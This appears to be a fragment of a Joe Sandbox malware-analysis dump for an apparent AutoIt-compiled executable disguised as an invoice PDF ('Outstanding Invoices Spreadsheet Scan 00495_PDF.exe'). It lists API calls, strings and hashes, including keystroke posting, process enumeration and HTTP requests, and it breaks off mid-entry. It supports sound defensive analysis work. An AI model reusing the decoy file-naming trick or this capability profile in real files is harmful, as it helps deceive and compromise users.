                                                                              • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                              • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0045F317
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                              • IsMenu.USER32(?), ref: 0045F380
                                                                              • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                              • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                              • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID: 0$2
                                                                              • API String ID: 3311875123-3793063076
                                                                              • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                              • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe), ref: 0043719E
                                                                              • LoadStringW.USER32(00000000), ref: 004371A7
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                              • LoadStringW.USER32(00000000), ref: 004371C0
                                                                              • _printf.LIBCMT ref: 004371EC
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                              Strings
                                                                              • C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, xrefs: 00437189
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_printf
                                                                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                              • API String ID: 220974073-1886467443
                                                                              • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                              • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                              • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                              • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                              • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                              • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                              • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                              Similarity
                                                                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 978794511-0
                                                                              • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                              • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                              • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                              • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                              • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                              • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                              • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                              APIs
                                                                                • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                              • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                              • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressProc_malloc$_strcat_strlen
                                                                              • String ID: AU3_FreeVar
                                                                              • API String ID: 2184576858-771828931
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                              • DestroyWindow.USER32(?), ref: 0042A751
                                                                              • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                              • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 4174999648-3243417748
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 1291720006-3916222277
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ErrorLastselect
                                                                              • String ID: HH
                                                                              • API String ID: 215497628-2761332787
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __snwprintf__wcsicoll_wcscpy
                                                                              • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                              • API String ID: 1729044348-3708979750
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                              • _wcscat.LIBCMT ref: 0044BCAA
                                                                              • _wcslen.LIBCMT ref: 0044BCB7
                                                                              • _wcslen.LIBCMT ref: 0044BCCB
                                                                              • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 2326526234-1173974218
                                                                              APIs
                                                                                • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                              • _wcslen.LIBCMT ref: 004366DD
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                              • GetLastError.KERNEL32 ref: 0043670F
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                              • _wcsrchr.LIBCMT ref: 0043674C
                                                                                • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                              • String ID: \
                                                                              • API String ID: 321622961-2967466578
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              APIs
                                                                              • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                              • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                              • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                              • __wsplitpath.LIBCMT ref: 00436FA0
                                                                              • _wcscat.LIBCMT ref: 00436FB2
                                                                              • __wcsicoll.LIBCMT ref: 00436FC4
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                              Similarity
                                                                              • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2903788889-0
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 0044157D
                                                                              • GetDC.USER32(00000000), ref: 00441585
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00401257
                                                                                • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              • KillTimer.USER32(?,?), ref: 004012B0
                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1792922140-0
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                              • ExitThread.KERNEL32 ref: 0041410F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                              • __freefls@4.LIBCMT ref: 00414135
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                              • String ID:
                                                                              • API String ID: 1925773019-0
                                                                              APIs
                                                                              • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                              • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                              • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                              • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                              • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                              • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                              • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                              • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
                                                                                • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                              • inet_addr.WSOCK32(?), ref: 00464B1F
                                                                              • gethostbyname.WSOCK32(?), ref: 00464B29
                                                                              • _memset.LIBCMT ref: 00464B92
                                                                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                              • WSACleanup.WSOCK32 ref: 00464CE4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                              • String ID:
                                                                              • API String ID: 3424476444-0
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID:
                                                                              • API String ID: 535477410-0
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _memset.LIBCMT ref: 004538C4
                                                                              • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                              • _wcslen.LIBCMT ref: 00453960
                                                                              • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 3530711334-4108050209
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                              • String ID: HH
                                                                              • API String ID: 3488606520-2761332787
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                              • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                              • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                              • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                              • LineTo.GDI32(?,?), ref: 004474BF
                                                                              • CloseFigure.GDI32(?), ref: 004474C6
                                                                              • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                              • Rectangle.GDI32(?,?), ref: 004474F3
                                                                              Similarity
                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 4082120231-0
                                                                              • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                              • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                              • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                              • String ID:
                                                                              • API String ID: 288456094-0
                                                                              • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                              • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                              • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004449B0
                                                                              • GetKeyboardState.USER32(?), ref: 004449C3
                                                                              • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                              • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                              • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00444BA9
                                                                              • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                              • SetKeyboardState.USER32(?), ref: 00444C08
                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                              • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                              • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                              • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                              • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                              • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                              • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00457C34
                                                                              • _memset.LIBCMT ref: 00457CE8
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                              • String ID: <$@
                                                                              • API String ID: 1325244542-1426351568
                                                                              • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                              • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                              • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                              • __wsplitpath.LIBCMT ref: 004737E1
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004737F6
                                                                              • __wcsicoll.LIBCMT ref: 00473818
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                              • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
